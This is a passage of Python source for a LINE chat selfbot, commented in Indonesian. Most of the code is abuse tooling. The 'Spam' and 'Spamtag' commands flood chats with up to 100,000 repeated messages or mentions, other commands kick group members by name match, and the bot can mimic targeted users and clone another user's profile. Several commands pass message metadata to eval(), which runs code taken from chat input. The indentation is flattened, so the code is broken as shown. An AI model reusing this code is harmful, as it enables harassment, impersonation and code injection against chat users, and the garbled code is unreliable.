if len(n.decode("utf-8")) > 30:
cl.sendText(msg.to,"terlalu lama")
else:
wait["cName"] = n
cl.sendText(msg.to,"Nama Jam Berubah menjadi:" + n)
elif msg.text.lower() == 'update':
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"?%H:%M?")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Diperbarui")
else:
cl.sendText(msg.to,"Silahkan Aktifkan Jam")
#==============================================================================#
#==============================================================================#
elif msg.text in ["Invite"]:
wait["invite"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Steal contact"]:
wait["contact"] = True
cl.sendText(msg.to,"Send Contact")
elif msg.text in ["Like:me","Like me"]: #Semua Bot Ngelike Status Akun Utama
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Owner")
try:
likeme()
except:
pass
elif msg.text in ["Like:friend","Like friend"]: #Semua Bot Ngelike Status Teman
print "[Command]Like executed"
cl.sendText(msg.to,"Like Status Teman")
try:
likefriend()
except:
pass
elif msg.text in ["Like:on","Like on"]:
if wait["likeOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["Like off","Like:off"]:
if wait["likeOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
wait["likeOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Already")
elif msg.text in ["My simisimi on","Simisimi:on"]:
settings["simiSimi"][msg.to] = True
cl.sendText(msg.to,"Success activated simisimi")
elif msg.text in ["My simisimi off","Simisimi:off"]:
settings["simiSimi"][msg.to] = False
cl.sendText(msg.to,"Success deactive simisimi")
elif msg.text in ["My read on","Read:on"]:
wait['alwayRead'] = True
cl.sendText(msg.to,"Auto Sider ON")
elif msg.text in ["My read off","Read:off"]:
wait['alwayRead'] = False
cl.sendText(msg.to,"Auto Sider OFF")
elif msg.text in ["My autorespon on","Autorespon:on","My respon on","Respon:on"]:
wait["detectMention"] = True
cl.sendText(msg.to,"Auto Respon ON")
elif msg.text in ["My autorespon off","Autorespon:off","My respon off","Respon:off"]:
wait["detectMention"] = False
cl.sendText(msg.to,"Auto Respon OFF")
elif msg.text in ["Tag on","Autokick:on","Responkick on","Responkick:on"]:
wait["kickMention"] = True
cl.sendText(msg.to,"[AUTO RESPOND] Auto Kick yang tag ON")
elif msg.text in ["Tag off","Autokick:off","Responkick off","Responkick:off"]:
wait["kickMention"] = False
cl.sendText(msg.to,"[AUTO RESPOND] Auto Kick yang tag OFF")
#==============================================================================#
elif "らたかn" in msg.text:
if msg.toType == 2:
print "ok"
_name = msg.text.replace("らたかn","")
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
sendMessage(msg.to,"Not found.")
else:
for target in targets:
try:
klist=[cl]
kicker=random.choice(klist)
random.choice(KAC).kickoutFromGroup(msg.to,[target])
print (msg.to,[g.mid])
except:
sendMessage(msg.to,"Grup Dibersihkan")
elif ("Kick " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif ("Ulti " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"] [0] ["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
cl.kickoutFromGroup(msg.to,[target])
except:
cl.sendText(msg.to,"Error")
elif "Kick: " in msg.text:
midd = msg.text.replace("Kick: ","")
cl.kickoutFromGroup(msg.to,[midd])
elif 'invite ' in msg.text.lower():
key = msg.text[-33:]
cl.findAndAddContactsByMid(key)
cl.inviteIntoGroup(msg.to, [key])
contact = cl.getContact(key)
elif msg.text.lower() == 'cancel':
if msg.toType == 2:
group = cl.getGroup(msg.to)
if group.invitee is not None:
gInviMids = [contact.mid for contact in group.invitee]
cl.cancelGroupInvitation(msg.to, gInviMids)
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Tidak ada undangan")
else:
cl.sendText(msg.to,"Invitan tidak ada")
elif msg.text.lower() == 'link on':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = False
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL open")
else:
cl.sendText(msg.to,"URL open")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text.lower() == 'link off':
if msg.toType == 2:
group = cl.getGroup(msg.to)
group.preventJoinByTicket = True
cl.updateGroup(group)
if wait["lang"] == "JP":
cl.sendText(msg.to,"URL close")
else:
cl.sendText(msg.to,"URL close")
else:
if wait["lang"] == "JP":
cl.sendText(msg.to,"It can not be used outside the group")
else:
cl.sendText(msg.to,"Can not be used for groups other than")
elif msg.text in ["Url","Gurl"]:
if msg.toType == 2:
g = cl.getGroup(msg.to)
if g.preventJoinByTicket == True:
g.preventJoinByTicket = False
cl.updateGroup(g)
gurl = cl.reissueGroupTicket(msg.to)
cl.sendText(msg.to,"line://ti/g/" + gurl)
elif "Gcreator" == msg.text:
try:
group = cl.getGroup(msg.to)
GS = group.creator.mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': GS}
cl.sendMessage(M)
except:
W = group.members[0].mid
M = Message()
M.to = msg.to
M.contentType = 13
M.contentMetadata = {'mid': W}
cl.sendMessage(M)
cl.sendText(msg.to,"Creator Grup")
elif msg.text.lower() == 'invite:gcreator':
if msg.toType == 2:
ginfo = cl.getGroup(msg.to)
try:
gcmid = ginfo.creator.mid
except:
gcmid = "Error"
if wait["lang"] == "JP":
cl.inviteIntoGroup(msg.to,[gcmid])
else:
cl.inviteIntoGroup(msg.to,[gcmid])
elif ("Gname: " in msg.text):
if msg.toType == 2:
X = cl.getGroup(msg.to)
X.name = msg.text.replace("Gname: ","")
cl.updateGroup(X)
elif msg.text.lower() == 'infogrup':
group = cl.getGroup(msg.to)
try:
gCreator = group.creator.displayName
except:
gCreator = "Error"
md = "[Nama Grup : ]\n" + group.name + "\n\n[Id Grup : ]\n" + group.id + "\n\n[Pembuat Grup :]\n" + gCreator + "\n\n[Gambar Grup : ]\nhttp://dl.profile.line-cdn.net/" + group.pictureStatus
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
elif msg.text.lower() == 'grup id':
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "[%s]:%s\n" % (cl.getGroup(i).name,i)
cl.sendText(msg.to,h)
#==============================================================================#
elif "Checkmid: " in msg.text:
saya = msg.text.replace("Checkmid: ","")
msg.contentType = 13
msg.contentMetadata = {"mid":saya}
cl.sendMessage(msg)
contact = cl.getContact(saya)
cu = cl.channel.getCover(saya)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Checkid: " in msg.text:
saya = msg.text.replace("Checkid: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).id
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Friendlist"]:
contactlist = cl.getAllContactIds()
kontak = cl.getContacts(contactlist)
num=1
msgs="═════════List Friend═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Memlist"]:
kontak = cl.getGroup(msg.to)
group = kontak.members
num=1
msgs="═════════List Member═════════-"
for ids in group:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group)
cl.sendText(msg.to, msgs)
elif "Grupmember: " in msg.text:
saya = msg.text.replace('Grupmember: ','')
gid = cl.getGroupIdsJoined()
num=1
msgs="═════════List Member═════════-"
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
me = gna.members(i)
msgs+="\n[%i] %s" % (num, me.displayName)
num=(num+1)
msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(me)
if h == saya:
cl.sendText(msg.to, msgs)
elif "Friendinfo: " in msg.text:
saya = msg.text.replace('Friendinfo: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
contact = cl.getContact(i)
cu = cl.channel.getCover(i)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
if h == saya:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
elif "Friendpict: " in msg.text:
saya = msg.text.replace('Friendpict: ','')
gid = cl.getAllContactIds()
for i in gid:
h = cl.getContact(i).displayName
gna = cl.getContact(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif msg.text in ["Friendlistmid"]:
gruplist = cl.getAllContactIds()
kontak = cl.getContacts(gruplist)
num=1
msgs="═════════List FriendMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.mid)
num=(num+1)
msgs+="\n═════════List FriendMid═════════\n\nTotal Friend : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Blocklist"]:
blockedlist = cl.getBlockedContactIds()
kontak = cl.getContacts(blockedlist)
num=1
msgs="═════════List Blocked═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.displayName)
num=(num+1)
msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplist"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List Grup═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.name)
num=(num+1)
msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif msg.text in ["Gruplistmid"]:
gruplist = cl.getGroupIdsJoined()
kontak = cl.getGroups(gruplist)
num=1
msgs="═════════List GrupMid═════════"
for ids in kontak:
msgs+="\n[%i] %s" % (num, ids.id)
num=(num+1)
msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak)
cl.sendText(msg.to, msgs)
elif "Grupimage: " in msg.text:
saya = msg.text.replace('Grupimage: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
gna = cl.getGroup(i)
if h == saya:
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus)
elif "Grupname" in msg.text:
saya = msg.text.replace('Grupname','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[Nama Grup : ]\n" + gid.name)
elif "Grupid" in msg.text:
saya = msg.text.replace('Grupid','')
gid = cl.getGroup(msg.to)
cl.sendText(msg.to, "[ID Grup : ]\n" + gid.id)
elif "Grupinfo: " in msg.text:
saya = msg.text.replace('Grupinfo: ','')
gid = cl.getGroupIdsJoined()
for i in gid:
h = cl.getGroup(i).name
group = cl.getGroup(i)
if h == saya:
try:
creator = group.creator.mid
msg.contentType = 13
msg.contentMetadata = {'mid': creator}
md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id
if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan"
else: md += "\n\nKode Url : Diblokir"
if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang"
else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang"
cl.sendText(msg.to,md)
cl.sendMessage(msg)
cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus)
except:
creator = "Error"
elif msg.text in ["Glist"]:
gid = cl.getGroupIdsJoined()
h = ""
for i in gid:
h += "%s\n" % (cl.getGroup(i).name +" ? ["+str(len(cl.getGroup(i).members))+"]")
cl.sendText(msg.to,"-- List Groups --\n\n"+ h +"\nTotal groups =" +" ["+str(len(gid))+"]")
elif msg.text.lower() == 'gcancel':
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"Aku menolak semua undangan")
else:
cl.sendText(msg.to,"He declined all invitations")
elif "Auto add" in msg.text:
thisgroup = cl.getGroups([msg.to])
Mids = [contact.mid for contact in thisgroup[0].members]
mi_d = Mids[:33]
cl.findAndAddContactsByMids(mi_d)
cl.sendText(msg.to,"Success Add all")
#==============================================================================#
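# tagall: mention every member of the group; summon() is presumably a helper defined earlier that builds the mention payload.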
elif "tagall" == msg.text.lower():
group = cl.getGroup(msg.to)
nama = [contact.mid for contact in group.members]
jml = len(nama)
if jml > 500:
    print "Too many members to mention (500+)"
else:
    # mention in batches of 100 so each message stays under the mention limit
    for i in range(0, jml, 100):
        summon(msg.to, nama[i:i + 100])
cnt = Message()
cnt.text = "Jumlah:\n" + str(jml) + " Members"
cnt.to = msg.to
cl.sendMessage(cnt)
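# "sider" feature: store a read point in sider.json and later report members who read without replying (lurkers).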
elif "sider on" == msg.text.lower():
if msg.to in wait2['readPoint']:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to,"Cek Sider already on")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
wait2['readPoint'][msg.to] = msg.id
wait2['readMember'][msg.to] = ""
wait2['setTime'][msg.to] = datetime.now().strftime('%H:%M:%S')
wait2['ROM'][msg.to] = {}
with open('sider.json', 'w') as fp:
json.dump(wait2, fp, sort_keys=True, indent=4)
cl.sendText(msg.to, "Set reading point:\n" + datetime.now().strftime('%H:%M:%S'))
print wait2
elif "sider off" == msg.text.lower():
if msg.to not in wait2['readPoint']:
cl.sendText(msg.to,"Cek Sider already off")
else:
try:
del wait2['readPoint'][msg.to]
del wait2['readMember'][msg.to]
del wait2['setTime'][msg.to]
except:
pass
cl.sendText(msg.to, "Delete reading point:\n" + datetime.now().strftime('%H:%M:%S'))
elif "sider" == msg.text.lower():
if msg.to in wait2['readPoint']:
if wait2["ROM"][msg.to].items() == []:
cl.sendText(msg.to, "Sider:\nNone")
else:
chiya = []
for rom in wait2["ROM"][msg.to].items():
chiya.append(rom[1])
cmem = cl.getContacts(chiya)
zx = ""
zxc = ""
zx2 = []
xpesan = 'Lurkers:\n'
for x in range(len(cmem)):
xname = str(cmem[x].displayName)
pesan = ''
pesan2 = pesan+"@a\n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':cmem[x].mid}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
print zxc
msg.text = xpesan+ zxc + "\nLurking time: %s\nCurrent time: %s"%(wait2['setTime'][msg.to],datetime.now().strftime('%H:%M:%S'))
lol ={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
print lol
msg.contentMetadata = lol
try:
cl.sendMessage(msg)
except Exception as error:
print error
pass
else:
cl.sendText(msg.to, "Lurking has not been set.")
elif "Gbroadcast: " in msg.text:
bc = msg.text.replace("Gbroadcast: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendText(i,"[Broadcast]\n\n"+bc+"\n\nline.me/ti/p/~mpskraakh")
elif "Cbroadcast: " in msg.text:
bc = msg.text.replace("Cbroadcast: ","")
gid = cl.getAllContactIds()
for i in gid:
cl.sendText(i, bc)
elif "GbroadcastImage: " in msg.text:
bc = msg.text.replace("GbroadcastImage: ","")
gid = cl.getGroupIdsJoined()
for i in gid:
cl.sendImageWithURL(i, bc)
elif "CbroadcastImage: " in msg.text:
bc = msg.text.replace("CbroadcastImage: ","")
gid = cl.getAllContactIds()
for i in gid:
cl.sendImageWithURL(i, bc)
elif "Spam change: " in msg.text:
wait["spam"] = msg.text.replace("Spam change: ","")
cl.sendText(msg.to,"spam changed")
elif "Spam add: " in msg.text:
wait["spam"] = msg.text.replace("Spam add: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"spam changed")
else:
cl.sendText(msg.to,"Done")
elif "Spam: " in msg.text:
strnum = msg.text.replace("Spam: ","")
num = int(strnum)
for var in range(0,num):
cl.sendText(msg.to, wait["spam"])
elif "Spamtag @" in msg.text:
_name = msg.text.replace("Spamtag @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
xname = g.displayName
xlen = str(len(xname)+1)
msg.contentType = 0
msg.text = "@"+xname+" "
msg.contentMetadata ={'MENTION':'{"MENTIONEES":[{"S":"0","E":'+json.dumps(xlen)+',"M":'+json.dumps(g.mid)+'}]}','EMTVER':'4'}
# send the mention repeatedly (20 times, as in the original repeated calls)
for i in range(20):
    cl.sendMessage(msg)
else:
pass
elif "Spam" in msg.text:
txt = msg.text.split(" ")
jmlh = int(txt[2])
teks = msg.text.replace("Spam "+str(txt[1])+" "+str(jmlh)+" ","")
tulisan = jmlh * (teks+"\n")
if txt[1] == "on":
if jmlh <= 100000:
for x in range(jmlh):
cl.sendText(msg.to, teks)
else:
cl.sendText(msg.to, "Out of Range!")
elif txt[1] == "off":
if jmlh <= 100000:
cl.sendText(msg.to, tulisan)
else:
cl.sendText(msg.to, "Out Of Range!")
elif ("Micadd " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
mimic["target"][target] = True
cl.sendText(msg.to,"Target ditambahkan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif ("Micdel " in msg.text):
targets = []
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
del mimic["target"][target]
cl.sendText(msg.to,"Target dihapuskan!")
break
except:
cl.sendText(msg.to,"Fail !")
break
elif msg.text in ["Miclist"]:
if mimic["target"] == {}:
cl.sendText(msg.to,"nothing")
else:
mc = "Target mimic user\n"
for mi_d in mimic["target"]:
mc += "?? "+cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif "Mimic target " in msg.text:
if mimic["copy"] == True:
siapa = msg.text.replace("Mimic target ","")
if siapa.rstrip(' ') == "me":
mimic["copy2"] = "me"
cl.sendText(msg.to,"Mimic change to me")
elif siapa.rstrip(' ') == "target":
mimic["copy2"] = "target"
cl.sendText(msg.to,"Mimic change to target")
else:
cl.sendText(msg.to,"I dont know")
elif "Mimic " in msg.text:
cmd = msg.text.replace("Mimic ","")
if cmd == "on":
if mimic["status"] == False:
mimic["status"] = True
cl.sendText(msg.to,"Reply Message on")
else:
cl.sendText(msg.to,"Sudah on")
elif cmd == "off":
if mimic["status"] == True:
mimic["status"] = False
cl.sendText(msg.to,"Reply Message off")
else:
cl.sendText(msg.to,"Sudah off")
#elif msg.text.lower() in dangerMessage:
# if msg.toType == 2:
# try:
# cl.kickoutFromGroup(msg.to,[msg.from_])
# except:
# cl.kickoutFromGroup(msg.to,[msg.from_])
elif "Setimage: " in msg.text:
wait["pap"] = msg.text.replace("Setimage: ","")
cl.sendText(msg.to, "Pap telah di Set")
elif msg.text in ["Papimage","Papim","Pap"]:
cl.sendImageWithURL(msg.to,wait["pap"])
elif "Setvideo: " in msg.text:
wait["pap"] = msg.text.replace("Setvideo: ","")
cl.sendText(msg.to,"Video Has Ben Set To")
elif msg.text in ["Papvideo","Papvid"]:
cl.sendVideoWithURL(msg.to,wait["pap"])
#==============================================================================#
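# Google image search; download_page() and _images_get_all_items() are presumably scraper helpers defined earlier in this script.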
elif '/image ' in msg.text:
googl = msg.text.replace('/image ',"")
url = 'https://www.google.com/search?hl=en&biw=1366&bih=659&tbm=isch&sa=1&ei=vSD9WYimHMWHvQTg_53IDw&q=' + googl
raw_html = (download_page(url))
items = []
items = items + (_images_get_all_items(raw_html))
path = random.choice(items)
try:
start = time.time()
cl.sendImageWithURL(msg.to,path)
elapsed = time.time() - start
cl.sendText(msg.to, "Google Image \nType: Search Image\nWaktu dicari: %s" % (elapsed) + "\nTotal Image Links = " + str(len(items)))
print "[Notif] Search Image Google Sucess"
except Exception as e:
cl.sendText(msg.to, str(e))
elif msg.text.lower() == 'mymid':
cl.sendText(msg.to,mid)
elif "Timeline: " in msg.text:
tl_text = msg.text.replace("Timeline: ","")
cl.sendText(msg.to,"line://home/post?userMid="+mid+"&postId="+cl.new_post(tl_text)["result"]["post"]["postInfo"]["postId"])
elif "Myname: " in msg.text:
string = msg.text.replace("Myname: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.displayName = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string + "")
elif "Mybio: " in msg.text:
string = msg.text.replace("Mybio: ","")
if len(string.decode('utf-8')) <= 10000000000:
profile = cl.getProfile()
profile.statusMessage = string
cl.updateProfile(profile)
cl.sendText(msg.to,"Changed " + string)
elif msg.text in ["Myname"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[DisplayName]===\n" + h.displayName)
elif msg.text in ["Mybio"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"===[StatusMessage]===\n" + h.statusMessage)
elif msg.text in ["Mypict"]:
h = cl.getContact(mid)
cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Myvid"]:
h = cl.getContact(mid)
cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Urlpict"]:
h = cl.getContact(mid)
cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus)
elif msg.text in ["Mycover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
elif msg.text in ["Urlcover"]:
h = cl.getContact(mid)
cu = cl.channel.getCover(mid)
path = str(cu)
cl.sendText(msg.to, path)
elif "Getmid @" in msg.text:
_name = msg.text.replace("Getmid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
for g in gs.members:
if _nametarget == g.displayName:
cl.sendText(msg.to, g.mid)
else:
pass
elif "Getinfo" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu))
except:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu))
elif "Getbio" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
except:
cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage)
elif "Getname" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
try:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
except:
cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName)
elif "Getprofile" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
contact = cl.getContact(key1)
cu = cl.channel.getCover(key1)
path = str(cu)
image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
try:
cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage)
cl.sendText(msg.to,"Profile Picture " + contact.displayName)
cl.sendImageWithURL(msg.to,image)
cl.sendText(msg.to,"Cover " + contact.displayName)
cl.sendImageWithURL(msg.to,path)
except:
pass
elif "Getcontact" in msg.text:
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
mmid = cl.getContact(key1)
msg.contentType = 13
msg.contentMetadata = {"mid": key1}
cl.sendMessage(msg)
elif "Getpict @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getpict @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getvid @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Getvid @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendVideoWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Picturl @" in msg.text:
print "[Command]dp executing"
_name = msg.text.replace("Picturl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]dp executed"
elif "Getcover @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Getcover @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendImageWithURL(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Coverurl @" in msg.text:
print "[Command]cover executing"
_name = msg.text.replace("Coverurl @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to,"Contact not found")
else:
for target in targets:
try:
contact = cl.getContact(target)
cu = cl.channel.getCover(target)
path = str(cu)
cl.sendText(msg.to, path)
except Exception as e:
raise e
print "[Command]cover executed"
elif "Getgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendImageWithURL(msg.to,path)
elif "Urlgrup image" in msg.text:
group = cl.getGroup(msg.to)
path = "http://dl.profile.line-cdn.net/" + group.pictureStatus
cl.sendText(msg.to,path)
elif "Mycopy @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("Mycopy @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
cl.CloneContactProfile(target)
cl.sendText(msg.to, "Copied.")
except Exception as e:
print e
